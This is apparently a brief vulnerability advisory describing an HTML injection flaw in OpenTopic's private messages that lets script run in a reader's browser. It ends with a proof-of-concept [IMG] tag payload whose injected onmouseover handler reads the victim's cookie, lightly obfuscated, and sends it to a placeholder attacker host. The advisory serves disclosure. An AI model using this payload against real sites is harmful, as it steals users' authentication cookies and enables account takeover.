source: https://www.securityfocus.com/bid/6523/info

An HTML injection vulnerability has been reported for OpenTopic. The vulnerability exists because OpenTopic does not sufficiently sanitize HTML code from private message posts.

When a victim views a private message that contains malicious HTML code, that code is executed in the victim's web browser in the security context of the site.

Exploitation may allow for theft of cookie-based authentication credentials or other attacks.

[IMG]http://[website]/img.gif"width="750"height="750"onmouseover="
a=document['coo'+'kie'];location='http://[attacker]/?'+a;[/IMG]